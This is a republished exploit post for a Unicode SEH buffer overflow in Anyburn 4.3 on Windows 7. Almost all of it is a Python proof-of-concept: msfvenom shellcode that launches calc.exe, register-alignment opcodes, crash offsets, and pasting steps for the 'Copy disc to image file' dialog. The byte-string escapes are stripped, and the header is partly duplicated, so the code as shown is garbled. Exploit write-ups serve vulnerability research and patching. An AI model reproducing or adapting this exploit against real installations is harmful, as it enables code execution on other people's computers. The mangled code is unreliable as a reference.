Anyburn 4.x x86 Buffer Overflow

Details
Category: Vulnerabilities
Hits: 315
#!/usr/bin/python
# Exploit Title: Anyburn 4.3 - 'Copy disc to image file' Buffer Overflow - (UNICODE)(SEH)
# Version: 4.3
# Date: 07-03-2019
# Auth #!/usr/bin/python
# Exploit Title: Anyburn 4.3 - 'Copy disc to image file' Buffer Overflow - (UNICODE)(SEH)
# Version: 4.3
# Date: 07-03-2019
# Author: Hodorsec (hodorsec@protonmail.com / hodor@hodorsec.com)
# Vendor Homepage: http://www.anyburn.com/
# Software Link: http://www.anyburn.com/download.php
# Tested on: Win7 x86 SP1 build 7601
# Caveats: - Heavy character expansion from byte range 0x80 until 0x9f. I've mapped the character translation for convenience.
# - Modify 'crash_nseh' and 'ret_jmp' variable offsets for different OS'es / servicepacks
#
# Character expansion mapping
# 80 --> 20ac, 81 --> 81
# 82 --> 201a, 83 --> 0192
# 84 --> 201e, 85 --> 2026
# 86 --> 2020, 87 --> 2021
# 88 --> 02c6, 89 --> 2030
# 8a --> 0160, 8b --> 2039
# 8c --> 0152, 8d --> 8d
# 8e --> 017d, 8f --> 8f
# 90 --> 90 , 91 --> 2018
# 92 --> 2019, 93 --> 201c
# 94 --> 201d, 95 --> 2022
# 96 --> 2013, 97 --> 2014
# 98 --> 02dc, 99 --> 2122
# 9a --> 0161, 9b --> 203a
# 9c --> 0153, 9d --> 9d
# 9e --> 017e, 9f --> 0178
#
# PoC
# 1.) Generate sploit_anyBURN_seh_unicode.txt, copy the contents to clipboard
# 2.) In the application, open 'Copy disc to image file'
# 3.) Paste the contents of the TXT file in 'Image file name'
# 4.) Click "Create Now" and watch Anyburn BURN!

import sys, struct

filename = "sploit_anyburn_seh_unicode.txt"

# Maximum length
maxlen = 10000

# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -f python -b "x00x0ax0d" -v shellcode bufferregister=eax
# Size 512
shellcode = ""
shellcode += "x50x50x59x41x49x41x49x41x49x41x49x41"
shellcode += "x49x41x49x41x49x41x49x41x49x41x49x41"
shellcode += "x49x41x49x41x49x41x49x41x6ax58x41x51"
shellcode += "x41x44x41x5ax41x42x41x52x41x4cx41x59"
shellcode += "x41x49x41x51x41x49x41x51x41x49x41x68"
shellcode += "x41x41x41x5ax31x41x49x41x49x41x4ax31"
shellcode += "x31x41x49x41x49x41x42x41x42x41x42x51"
shellcode += "x49x31x41x49x51x49x41x49x51x49x31x31"
shellcode += "x31x41x49x41x4ax51x59x41x5ax42x41x42"
shellcode += "x41x42x41x42x41x42x6bx4dx41x47x42x39"
shellcode += "x75x34x4ax42x79x6cx39x58x35x32x6dx30"
shellcode += "x4bx50x6bx50x73x30x64x49x4bx35x4ex51"
shellcode += "x35x70x61x54x74x4bx6ex70x6ex50x64x4b"
shellcode += "x61x42x7ax6cx72x6bx62x32x6dx44x64x4b"
shellcode += "x44x32x6bx78x5ax6fx45x67x6fx5ax6bx76"
shellcode += "x4dx61x49x6fx34x6cx4fx4cx43x31x71x6c"
shellcode += "x39x72x4ex4cx4bx70x49x31x38x4fx4cx4d"
shellcode += "x6ax61x76x67x67x72x58x72x31x42x62x37"
shellcode += "x64x4bx50x52x7ax70x32x6bx4fx5ax4fx4c"
shellcode += "x42x6bx70x4cx6bx61x34x38x7ax43x51x38"
shellcode += "x6dx31x78x51x6fx61x52x6bx30x59x6fx30"
shellcode += "x4bx51x79x43x72x6bx4fx59x5ax78x68x63"
shellcode += "x6cx7ax30x49x62x6bx4ex54x42x6bx6bx51"
shellcode += "x4ax36x4cx71x6bx4fx44x6cx46x61x78x4f"
shellcode += "x4cx4dx69x71x56x67x6cx78x57x70x63x45"
shellcode += "x59x66x6ax63x51x6dx4ax58x4dx6bx71x6d"
shellcode += "x4ex44x52x55x4bx34x42x38x54x4bx4ex78"
shellcode += "x6bx74x79x71x79x43x53x36x74x4bx4ax6c"
shellcode += "x50x4bx34x4bx31x48x4dx4cx69x71x57x63"
shellcode += "x72x6bx4ax64x74x4bx69x71x78x50x31x79"
shellcode += "x50x44x6dx54x6cx64x71x4bx51x4bx70x61"
shellcode += "x72x39x70x5ax30x51x39x6fx6bx30x61x4f"
shellcode += "x31x4fx6fx6ax32x6bx4dx42x4ax4bx72x6d"
shellcode += "x4fx6dx51x5ax39x71x42x6dx75x35x75x62"
shellcode += "x4dx30x59x70x4dx30x70x50x33x38x6ex51"
shellcode += "x52x6bx42x4fx53x57x6bx4fx46x75x55x6b"
shellcode += "x6ax50x46x55x33x72x4fx66x62x48x66x46"
shellcode += "x72x75x65x6dx43x6dx39x6fx67x65x6dx6c"
shellcode += "x39x76x61x6cx4ax6ax31x70x59x6bx79x50"
shellcode += "x74x35x49x75x35x6bx6fx57x6ex33x72x52"
shellcode += "x62x4fx70x6ax39x70x42x33x39x6fx49x45"
shellcode += "x42x43x4fx71x52x4cx70x63x4cx6ex30x65"
shellcode += "x51x68x51x55x49x70x41x41"

# Align reg EBP to RET into EAX
# EBP = 0x04f6acb8, Buffer = 0x04f6b70a, Buffer - EBP = 0x0a52 --> 0x0b00
align_ebp = (
"x73" # Padding
"x55" # PUSH EBP
"x73" # Padding
"x58" # POP EAX
"x73" # Padding
"x05x0fx11" # "x05x00x0fx00x11" # 05000f0011 add eax,0x11000f00 --
"x73" # Padding |--> Adds 0x0b00 bytes
"x2dx04x11" # "x2dx00x04x00x11" # 2d00040011 sub eax,0x11000400 --/
"x73" # Padding
"x50" # PUSH EAX
"x73" # Padding
"xc3" # RET
)

# Offsets
crash_nseh = 9197 # NSEH, might be different on other Windows version/SP
crash_seh = crash_nseh + 4 # SEH
ret_jmp = 87 # Offset for which the 'align_ebp' instructions land

# Variables
prefix = "x73" * ret_jmp # Padding
prefix += shellcode # UNICODE encoded shellcode
prefix += "x73" * (crash_nseh - len(prefix)) # Additional padding to reach NSEH
nseh = "x83x43" # 0x83 Expands to 0x0192 --> XCHG EAX,EDX # Expanded instruction in SEH now does get executed due to swapped regs
seh = "x95x47" # 0x00470095 Expands to 0x00472022 --> # POP POP RET # AnyBurn.exe
suffix = align_ebp # Align registers to jump to beginning of buffer
suffix += "x73" * (maxlen - len(prefix + nseh + seh + suffix)) # Padding

# Crafting payload
payload = prefix + nseh + seh + suffix

# Create file
f = open(filename, 'wb')
f.write(payload)
f.close()